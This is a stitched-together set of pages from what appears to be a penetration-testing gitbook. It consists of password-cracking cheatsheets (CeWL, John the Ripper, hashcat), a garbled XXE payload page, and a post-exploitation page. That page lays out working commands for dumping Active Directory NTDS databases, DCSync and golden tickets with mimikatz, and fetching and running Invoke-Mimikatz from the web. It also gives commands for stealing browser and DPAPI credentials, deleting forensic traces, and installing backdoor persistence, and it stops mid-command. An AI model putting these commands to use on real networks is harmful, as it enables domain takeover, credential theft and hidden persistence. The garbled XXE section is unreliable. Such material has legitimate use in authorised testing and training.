`https://github.com/berzerk0/Probable-Wordlists` `# Looks very cool wordlists` `https://github.com/FlameOfIgnis/Pwdb-Public` **CeWL** `# CeWL allows you to build custom wordlists based on online resources` `# If you know that your target is target.com, you can parse web content to build lists` `# Can be time consuming` `# 5 levels of depth and minimum 7 char per word` `cewl -w customwordlist.txt -d 5 -m 7 www.sans.org` `# Also visit and parse other sites` `cewl -w customwordlist.txt -d 5 -m 7 -o www.sans.org` `# Include e-mail adresses` `cewl -w customwordlist.txt -d 5 -m 7 -e www.sans.org` **PACK** `# Password Analysis and Cracking Kit` `# You can get stats about already cracked passwords` `# In order to define new masks` `https://github.com/iphelix/pack` `python statsgen.py rockyou.txt` **Combinator** `# Combinator is part of the hashcat-utils` `# It can be used to prepare a combinated wordlist for cracking` `# It allows then to combination + others settings like masks or rules` `combinator.exe file1 file2` `# It can create MASSIVE wordlists and take some time to run.` `# Three files combination` `combinator2.exe file1 file2 file3` `# You can also feed output directly to hashcat` `combinator.exe file1 file2 | hashcat -m x hashs.file -a 0 --force -O` [PreviousCracking fileschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/cracking-files) [NextWinRM (Windows Remote Management) Pentestingchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/winrm-windows-remote-management-pentesting) Last updated 2 years ago --- # XML External Entity (XXE) Injection Payloads | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) * XXE : Classic XXE Copy \ \ ]> &file; \ ]>&xxe; \ ]>&xxe; \ ]>&xxe; * XXE: Basic XML Example * XXE: Entity Example * XXE: File Disclosure * XXE: Denial-of-Service Example * XXE: Local File Inclusion Example * XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) * XXE: Access Control Bypass (Loading Restricted Resources - PHP example) * XXE:SSRF ( Server Side Request Forgery ) Example * XXE: (Remote Attack - Through External Xml Inclusion) Exmaple * XXE: UTF-7 Exmaple * XXE: Base64 Encoded * XXE: XXE inside SOAP Example * XXE: XXE inside SVG [PreviousGENERAL INFORMATIONchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/general-information) [NextPost exploitation techniqueschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/post-exploitation-techniques) Last updated 2 years ago Copy John Doe Copy ]> John &example; Copy ]> John &ent; Copy \ \ \ \ \ \ \ \ \ &lol9;\ \ Copy\ \ \ \ ]>&xxe;\ \ Copy\ \ \ \ \ ]>&blind;\ \ Copy\ \ \ ]>\ \ \ Copy\ \ \ \ ]>&xxe;\ \ Copy\ \ \ ]>\ 3..2..1...&test\ \ Copy\ \ \ +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4\ +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+\ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4\ \ Copy\ \ %init; ]>\ \ Copy\ \ \ \ %dtd;]>]]>\ \ \ \ Copy\ \ \ \ --- # John The Ripper Cheatsheet | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FWCFtacSCMYrIeEDYyj6E%252FF-PQ6QhWwAAvJIx.jpeg%3Falt%3Dmedia%26token%3Df6d3b26e-b233-4977-9605-bb9f4074fa0e&width=1248&dpr=3&quality=100&sign=9cef98d0&sv=2) **Cracking Modes** `# Dictionnary attack` `./john --wordlist=password.lst hashFile` `# Dictionnary attack using default or specific rules` `./john --wordlist=password.lst --rules=rulename hashFile` `./john --wordlist=password.lst --rules mypasswd` `# Incremental mode` `./john --incremental hashFile` `# Loopback attack (password are taken from the potfile)` `./john --loopback hashFile` `# Mask bruteforce attack` `./john --mask=?1?1?1?1?1?1 --1=[A-Z] hashFile --min-len=8` `# Dictionnary attack using masks` `./john --wordlist=password.lst -mask='?l?l?w?l' hashFile` **MISC & Tricks** `# Show hidden options` `./john --list=hidden-options` `# Using session and restoring them` `./john hashes --session=name` `./john --restore=name` `./john --session=allrules --wordlist=all.lst --rules mypasswd &` `./john status` `# Show the potfile` `./john hashes --pot=potFile --show` `# Search if a root/uid0 have been cracked` `john --show --users=0 mypasswdFile` `john --show --users=root mypasswdFile` `# List OpenCL devices and get their id` `./john --list=opencl-devices` `# List format supported by OpenCL` `./john --list=formats --format=opencl` `# Using multiples GPU` `./john hashes --format:openclformat --wordlist:wordlist --rules:rules --dev=0,1 --fork=2` `# Using multiple CPU (eg. 4 cores)` `./john hashes --wordlist:wordlist --rules:rules --dev=2 --fork=4` **Wordlists & Incremental** `# Sort a wordlist for the wordlist mode` `tr A-Z a-z < SOURCE | sort -u > TARGET` `# Use a potfile to generate a new wordlist` `cut -d ':' -f 2 john.pot | sort -u pot.dic` `# Generate candidate password for slow hashes` `./john --wordlist=password.lst --stdout --rules:Jumbo | ./unique -mem=25 wordlist.uniq` `--incremental:Lower # 26 char` `--incremental:Alpha # 52 char` `--incremental:Digits # 10 char` `--incremental:Alnum # 62 char` `# Create a new charset` `./john --make-charset=charset.chr` `# Then set the following in the John.conf` `# Incremental modes` `[Incremental:charset]` `File = $JOHN/charset.chr` `MinLen = 0` `MaxLen = 31` `CharCount = 95` `# Using a specific charset` `./john --incremental:charset hashFile` **Rules** `# Predefined rules` `--rules:Single` `--rules:Wordlist` `--rules:Extra` `--rules:Jumbo # All the above` `--rules:KoreLogic` `--rules:All # All the above` `# Create a new rule in John.conf` `[List.Rules:Tryout]` `l` `u` `...` `| Rule | Description |` `|------------ |------------------------------------------------------- |` `| l | Convert to lowercase |` `| u | Convert to uppercase |` `| c | Capitalize |` `| l r | Lowercase the word and reverse it |` `| l Az"2015" | Lowercase the word and append "2015" at the end |` `| d | Duplicate |` `| l A0"2015" | Lowercase the word and append "2015" at the beginning |` `| A0"#"Az"#" | Add "#" at the beginning and the end of the word |` `| C | Lowercase the first char and uppercase the rest |` `| t | Toggle case of all char |` `| TN | Toggle the case of the char in position N |` `| r | Reverse the word |` `| f | Reflect (Fred --> Fredderf) |` `| { | Rotate the word left |` `| } | Rotate the word right |` `| $x | Append char X to the word |` `| ^x | Prefix the word with X char |` `| [ | Remove the first char from the word |` `| ] | Remove the last char from the word |` `| DN | Delete the char in position N |` `| xNM | Extract substring from position N for M char |` `| iNX | Insert char X in position N and shift the rest right |` `| oNX | Overstrike char in position N with X |` `| S | Shift case |` `| V | Lowercase vowels and uppercase consonants |` `| R | Shift each char right on the keyboard |` `| L | Shift each char left on the keyboard |` `| N | Reject the word unless it is greater than N char long |` `| \'N | Truncate the word at length N |` [arrow-up-right](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/) [PreviousHashcat Cheatsheetchevron-left](https://morgan-bin-bash.gitbook.io/pentesting/hashcat-cheatsheet) [NextCracking fileschevron-right](https://morgan-bin-bash.gitbook.io/pentesting/cracking-files) Last updated 2 years ago --- # Hashcat Cheatsheet | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252FWCFtacSCMYrIeEDYyj6E%252FF-PQ6QhWwAAvJIx.jpeg%3Falt%3Dmedia%26token%3Df6d3b26e-b233-4977-9605-bb9f4074fa0e&width=1248&dpr=3&quality=100&sign=9cef98d0&sv=2) **MISC and tricks** #### [hashtag](https://morgan-bin-bash.gitbook.io/pentesting/hashcat-cheatsheet#https-www.notsosecure.com-one-rule-to-rule-them-all-max-power-force-the-cuda-gpu-interface-optimize) `https://www.notsosecure.com/one-rule-to-rule-them-all/` `# MAX POWER` `# force the CUDA GPU interface, optimize for <32 char passwords and set the workload to insane (-w 4).` `# It is supposed to make the computer unusable during the cracking process` `# Finnally, use both the GPU and CPU to handle the cracking` `--force -O -w 4 --opencl-device-types 1,2` **Wrapcat - Automating hashcat commands** `https://twitter.com/Haax9_/status/1340354639464722434?s=20` `https://github.com/Haax9/Wrapcat` `$ python wrapcat.py -m 1000 -f HASH_FILE.txt -p POT_FILE.txt --full --save` **Attack modes** `-a 0 # Straight : hash dict` `-a 1 # Combination : hash dict dict` `-a 3 # Bruteforce : hash mask` `-a 6 # Hybrid wordlist + mask : hash dict mask` `-a 7 # Hybrid mask + wordlist : hash mask dict` **Charsets** `?l # Lowercase a-z` `?u # Uppercase A-Z` `?d # Decimals` `?h # Hex using lowercase chars` `?H # Hex using uppercase chars` `?s # Special chars` `?a # All (l,u,d,s)` `?b # Binary` **Options** `-m # Hash type` `-a # Attack mode` `-r # Rules file` `-V # Version` `--status # Keep screen updated` `-b # Benchmark` `--runtime # Abort after X seconds` `--session [text] # Set session name` `--restore # Restore/Resume session` `-o filename # Output to filename` `--username # Ignore username field in a hash` `--potfile-disable # Ignore potfile and do not write` `--potfile-path # Set a potfile path` `-d # Specify an OpenCL Device` `-D # Specify an OpenCL Device Type` `-l # List OpenCL Devices & Types` `-O # Optimized Kernel, Passwords <32 chars` `-i # Increment (bruteforce)` `--increment-min # Start increment at X chars` `--increment-max # Stop increment at X chars` **Examples** `# Benchmark MD4 hashes` `hashcat -b -m 900` `# Create a hashcat session to hash Kerberos 5 tickets using wordlist` `hashcat -m 13100 -a 0 --session crackin1 hashes.txt wordlist.txt -o output.pot` `# Crack MD5 hashes using all char in 7 char passwords` `hashcat -m 0 -a 3 -i hashes.txt ?a?a?a?a?a?a?a -o output.pot` `# Crack SHA1 by using wordlist with 2 char at the end` `hashcat -m 100 -a 6 hashes.txt wordlist.txt ?a?a -o output.pot` `# Crack WinZip hash using mask (Summer2018!)` `hashcat -m 13600 -a 3 hashes.txt ?u?l?l?l?l?l?l?d?d?d?d! -o output.pot` `# Crack MD5 hashes using dictionnary and rules` `hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rules` `# Crack MD5 using combinator function with 2 dictionnaries` `hashcat -a 1 -m 0 example0.hash example.dict example.dict` `# Cracking NTLM hashes` `hashcat64 -m 1000 -a 0 -w 4 --force --opencl-device-types 1,2 -O d:\hashsample.hash "d:\WORDLISTS\realuniq.lst" -r OneRuleToRuleThemAll.rule` `# Cracking hashes from kerberoasting` `hashcat64 -m 13100 -a 0 -w 4 --force --opencl-device-types 1,2 -O d:\krb5tgs.hash d:\WORDLISTSealhuman_phill.txt -r OneRuleToRuleThemAll.rule` `# You can use hashcat to perform combined attacks` `# For example by using wordlist + mask + rules` `hashcat -a 6 -m 0 prenoms.txt ?d?d?d?d -r rules/yourule.rule` `# Single rule used to uppercase first letter --> Marie2018` `hashcat -a 6 -m 0 prenoms.txt ?d?d?d?d -j 'c'` **Scenario - Cracking large files (eg NTDS.dit)** `# Start by making a specific potfile and cracked files (clean environment)` `# - domain_ntds.dit` `# - domain_ntds_potfile.pot` `# Goal is to run many different instances with different settings, so each one have` `# to be quite quick` `# You can generate wordlist using CeWL` `# It usually works pretty well` `cewl -d 5 -m 4 -w OUTFILE -v URL` `cewl -d 5 -m 4 -w OUTFILE -o -v URL` `# With some basic dictionnary cracking (use known wordlists)` `# rockyou, hibp, crackstation, richelieu, kaonashi, french and english` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 0 rockyou.txt --force -O` `# Then start to use wordlists + masks + simple rule` `# For special chars, you can use a custom charset : "?!%$&#-_@+=* "` `# Multiple tests, multiples masks and multiples wordlists (including generated ones)` `.\hashcat64.exe -m 1000 hashs.txt -a 6 .\french\* '?d?d?d?d' -j c --increment --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 6 .\french\* -1 .\charsets\custom.chr '?1' -j c --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 6 .\french\* -1 .\charsets\custom.chr '?d?1' -j c --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 6 .\french\* -1 .\charsets\custom.chr '?d?d?1' -j c --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 6 .\french\* -1 .\charsets\custom.chr '?d?d?d?1' -j c --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 6 .\french\* -1 .\charsets\custom.chr '?d?d?d?d?1' -j c --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 6 CEWL_WORDLIST.txt -1 .\charsets\custom.chr '?d?d?d?d?1' -j c --force -O` `.\hashcat64.exe ...` `# Same commands and behavior but using mask after the tested word (mode 7)` `.\hashcat64.exe -m 1000 hashs.txt -a 7 '?d?d?d?d' .\french\* -j c --increment --force -O` `# Then, wordlists + complex rules` `# Once again run against multiple wordlists (including generated ones)` `# Kaonashi and OneRuleToRuleThemAll can produce maaaaaassive cracking time` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 0 french.txt -r .rules\best64.rule --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 0 french.txt -r .rules\OneRuleToRuleThemAll.rule --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 0 french.txt -r .rules\best64.rule --force -O` `.\hashcat64.exe ...` `# Then smart bruteforce using masks (custom charset can be usefull too)` `# Can be quite long, depending on the mask. Many little tests with different masks` `# Knowing for example that password is min 8 char long, only 8+ masks` `# Play by incrementing or decrementing char vs decimal (you can also use specific charset to reduce time)` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 '?u?l?l?l?d?d?d?d' --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 '?u?l?l?l?l?d?d?d' --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 '?u?l?l?l?l?l?d?d' --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 -1 .\charset\custom '?u?l?l?l?l?l?d?1' --force -O` `.\hashcat64.exe ...` `# Then increment mask size and play again` `# Can be longer for 9 char and above.. Up to you to decide which masks and how long you wanna wait` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 '?u?l?l?l?d?d?d?d?d' --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 '?u?l?l?l?l?d?d?d?d' --force -O` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 3 '?u?l?l?l?l?l?d?d?d' --force -O` `.\hashcat64.exe ...` `# If you have few hashes and small/medium wordlist, you can use random rules` `# And make several loops` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 0 wl.txt -g 1000000 --force -O -w 3` `# You can use combination attacks` `# For example, combine different names, or combine names with dates.. Then apply masks` `# Directly using hashcat` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 1 wordlist1.txt wordlist2.txt --force -O` `# Or in memory feeding, it allows you to use rules but not masks` `.\combinator.exe wordlist1.txt wordlist2.txt | .\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 0 -rules .ules\best64.rule --force -O` `# Or create the wordlist before and use it` `.\combinator.exe wordlist1.txt wordlist2.txt` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot -a 6 combinedwordlist.txt '?d?d?d?d' -j c --increment --force -O` `# Finally use your already cracked passwords to build a new wordlist` `.\hashcat64.exe -m 1000 hashs.txt --potfile-path potfile.pot --show | %{$_.split(':')[1]} > cracked.txt` `.\hashcat64.exe -m 1000 hashs.txt -a 6 cracked.txt '?d?d?d?d' -j c --increment --force -O` `.\hashcat64.exe -m 1000 hashs.txt -a 0 cracked.txt -r .rules\OneRuleToRuleThemAll.rule --force -O` `# You can also checks the target in popular leaks to find some password` `# Then try reuse or rules on them` [PreviousPost exploitation techniqueschevron-left](https://morgan-bin-bash.gitbook.io/pentesting/post-exploitation-techniques) [NextJohn The Ripper Cheatsheetchevron-right](https://morgan-bin-bash.gitbook.io/pentesting/john-the-ripper-cheatsheet) Last updated 2 years ago --- # Post exploitation techniques | Pentesting ![Page cover](https://morgan-bin-bash.gitbook.io/pentesting/~gitbook/image?url=https%3A%2F%2F833483961-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FA916U6dckatxb6TsA24w%252Fuploads%252Fz4hhNRD5uTWLfviuIG2Y%252F20.jpg%3Falt%3Dmedia%26token%3D094dfd16-6207-466f-8a81-3f2507f690d3&width=1248&dpr=3&quality=100&sign=59461e28&sv=2) **DC SHADOW** `# DC Shadow is a post compromission attack, allowing you to update replication metadata` `# On a compromised client, using a domain admin account` `# You can attack with Mimikatz` `# Terminal 1 (runas)` `mimikatz # !+` `mimikatz # !processtoken` `mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42` `# Terminal 2 (runas)` `mimikatz # lsadump::dcshadow /push` `# You can check the success throught repadmin on the DC` `repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"` **NTDS database** `# Initial location of the NTDS database on the domain controller` `C:\WindowsTDSTDS.dit` `# Step 1 → Finding a way to get the NDTS.dis and SYSTEM file` `# Step 2 → Crack/Analyze offline` **Local Extraction** **VSSadmin** `# Récupération via VSSadmin` `# Create a Volume Shadow Copy` `C:\Windows\system32> vssadmin create shadow /for=C:` `# Retrieve NTDS from the copy` `C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windowstdstds.dit c:\Extracttds.dit` `# Copy SYSTEM file` `C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS` `C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM` `# Delete tracks` `C:\Windows\system32> vssadmin delete shadows /shadow={uuid}` `# Trick if you are on a semi-interactive shell` `# You can specify /quiet option to not get the prompt` `# Can be usefull for deletion (as it require to confirm)` `vssadmin delete shadows /shadow={uuid} /quiet` **ntdsutil tool** `# ntdsutil is a builtin tool used to manage the AD` `# You can abuse it and create a backup of the ntds.dit file` `ntdsutil` `activate instance ntds` `ifm` `create full C:tdsutil` `quit` `quit` **DC Sync / Mimikatz** `# DC Sync is a less noisy way to extract users informations` `# It uses the DRS (Directory Replication Service)` `# Classic` `mimikatz # lsadump::dcsync /domain:domain.lan /all /csv` `# Specific user` `mimikatz # lsadump::dcsync /domain:domain.lan /user:test` **PowerSploit** `# PowerSploit contains a script using the volume shadow copy service` `Import-Module .\VolumeShadowCopyTools.ps1` `New-VolumeShadowCopy -Volume C:\` `Get-VolumeShadowCopy` `# Also possible through a meterpreter session` `powershell_shell` `New-VolumeShadowCopy -Volume C:\` `Get-VOlumeShadowCopy` **Invoke-DCSync** `# Powershell script` `# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz` `Invoke-DCSync` `# Get other format (user:id:lm:ntlm)` `Invoke-DCSync -PWDumpFormat` `# It is also possible through a meterpreter session` **Nishang** `# Nishang is a post exploitation framework allowing attacker to perform attacks` `# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files` `Import-Module .\Copy-VSS.ps1` `Copy-VSS` `Copy-VSS -DestinationDir C:\ShadowCopy\` `# You can also use them throught a meterpretrer session by loading the powershell extension` `load powershell` `powershell_import /root/Copy-VSS.ps1` `powershell_execute Copy-VSS` `# Also possible to establish a direct connection` `powershell_shell` `PS > Copy-VSS` `PS > Copy-VSS -DestinationDir C:inja` **Remote Extraction** **CrackMapExec** `crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi` **WMI - Remote** `# It is possible to remotely extract the NTDS database using WMI and VSSADMIN` `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"` `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"` `wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"` **Impacket** `$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL` `$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL` **NTDS Extraction and analysis** `# Impacket provides a usefull script to do that (decrypt copied files)` `impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit DOMAIN` `# Also possible to dump it remotely by using the computer account and its hash` `impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1` `# Extraction is also possible using NTDSDumpEx` `NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive` `# Or adXtract` `./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab` **Empire** `# Empire has 2 modules you can use to retrieve hashes through DCSync` `usemodule credentials/mimikatz/dcsync_hashdump` `usemodule credentials/mimikatz/dcsync` **Ticket generation from Linux** `# Generate a ticket or convert it (kekeo) to ccache format` `$ ticketer.py -nthash -domain-sid -domain ` `# Export the path in the right variable` `$ export KRB5CCNAME=/tmp/ticket.ccache` `$ klist` `# Exec and use the ticket` `$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host` `# Dump NTDS` `$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss` **Golden Ticket** `# Golden Ticket` `> Nom du compte administrateur (Administrateur)` `> Nom complet du domaine (domain.local)` `> SID du domaine (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]` `> Hash NTLM du compte krbtgt (6194bd1a5bf3ecd542e8aac9860bddf0)` `mimikatz # privilege:debug` `mimikatz # lsadump::lsa /inject /name:krbtgt` `mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt` `Use :` `mimikatz # kerberos::ptt domain.local.kirbi` `mimikatz # kerberos::list` `# Resource` `https://twitter.com/mpgn_x64/status/1241688547037532161` `# Golden ticket and access denied ?` `# from cmd (elevated)` `> mimikatz kerberos::golden` `> klist add_bind ` `> psexec \\dc\ cmd` **Playing with tickets on Windows** `# Sessions en cours` `mimikatz # sekurlsa::logonpasswords` `# Ticket TGT` `# Dump SPN` `PS C:\> Find-PSServiceAccounts -DumpSPN` `Discovering service account SPNs in the AD Domain foo.local` `svcSQLServ/pc1.foo.local:1433` `# Download Mimikatz` `PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')` `PS C:\> Invoke-Mimikatz` `mimikatz(powershell) # sekurlsa::logonpasswords` `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)` `# Lister les tickets actifs ou les purger` `PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'` `PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'` `PS C:\> klist` `# Demander un ticket` `PS C:\> Add-Type -AssemblyName System.IdentityModel` `PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"` `# Exporter un ticket` `mimikatz # kerberos::list /export` `# Crack Ticket` `python tgsrepcrack.py wordlist.txt ticket.kirbi` **Tips** `# Getting passwords from browser memory` `procdump.exe -ma firefox_pid` `strings.exe firefox.dmp | findstr /i "Passwd="` **Scavenger** `# Scavenger is a tool used above CrackMapExec to automate the process` `# of looking for sensitive files and informations during Internal Pentest` `python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local` `$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite` **WinSCP** `# WinSCP is potentially exploitable in the registry if not using a master password` `# You can manually request the key` `reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"` `reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"` `# Then let s recover the password using the following binary` `https://github.com/anoopengineer/winscppasswd/releases` `.\winscppasswd ip user` `# Automatisation using CrackMapExec` `# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP` `crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher` **Snaffler** `https://github.com/SnaffCon/Snaffler` `# Snaffler is a tool made to automate information gathering on windows and domains` `# it focuses location such as network shares etc.` `snaffler.exe -s -o snaffler.log` `-o Enables outputting results to a file. You probably want this if youre not using -s. e.g. -o C:\usershing\snaffler.log` `-s Enables outputting results to stdout as soon as theyre found. You probably want this if you re not using -o.` `-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug` `-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.` `-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.` `-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.` `-d Domain to search for computers to search for shares on to search for files in. Easy.` `-c Domain controller to query for the list of domain computers.` `-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.` `-j How many bytes of context either side of found strings in files to show, e.g. -j 200` `-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.` **DonPAPI** `https://github.com/login-securite/DonPAPI` `# Dumping revelant information on compromised targets without AV detection` `# With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.` `# Currently gathered info` `# - Windows credentials (Taskscheduled credentials & a lot more)` `# - Windows Vaults` `# - Windows RDP credentials` `# - AdConnect (still require a manual operation)` `# - Wifi key` `# - Intenet explorer Creentials` `# - Chrome cookies & credentials` `# - Firefox cookies & credentials` `# - VNC passwords` `# - mRemoteNG password (with default config)` `# Classic launch` `DonPAPI.py domain/user:passw0rd@target` `# Using hash` `DonPAPI.py --hashes : domain/user@target` `# Using Kerberos or local auth` `DonPAPI.py -k domain/user@target` `DonPAPI.py -local_auth user@target` `# If user has LAPS reading privilege` `DonPAPI.py -laps domain/user:passw0rd@target` `# If you are domain admin, you can dump the domain backup key using impacket` `# Then you can use the PVK (backup key) to dump all users secrets` `dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip` `python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list` **PERSISTENCE** **Resources** `https://rastamouse.me/2018/03/a-view-of-persistence/` **Userland & Elevated** `# Userland techniques` `# HKCU` `# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).` `Value name: Backdoor` `Value data: C:\Usersasta\AppData\Localemp\backdoor.exe` `# Start-up` `# Create a batch script in the user startup folder.` `PS C:\> gc C:\Usersasta\AppDataoaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat` `start /b C:\Usersasta\AppData\Localemp\backdoor.exe` `# Scheduled Tasks` `PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"` `PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"` `PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"` `PS C:\> $S = New-ScheduledTaskSettingsSet` `PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S` `PS C:\> Register-ScheduledTask Backdoor -InputObject $D` `# Powershell profiles` `# You can backdoor the powershell profile` `PS C:\> Test-Path $profile` `False` `PS C:\> New-Item -Path $profile -Type File –Force` `Directory: C:\Usersasta\Documents\WindowsPowerShell` `Mode LastWriteTime Length Name` `---- ------------- ------ ----` `-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1` `PS C:\> $string = 'Start-Process "cmd.exe"'` `PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append` `# Elevated techniques` `# HKLM` `# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows` `Value name: Backdoor` `Value data: C:\Windowsemp\backdoor.exe` `# Services` `# Create a service that will start automatically or on-demand.` `PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."` `# Scheduled Tasks` `PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"` `PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am` `PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest` `PS C:\> $S = 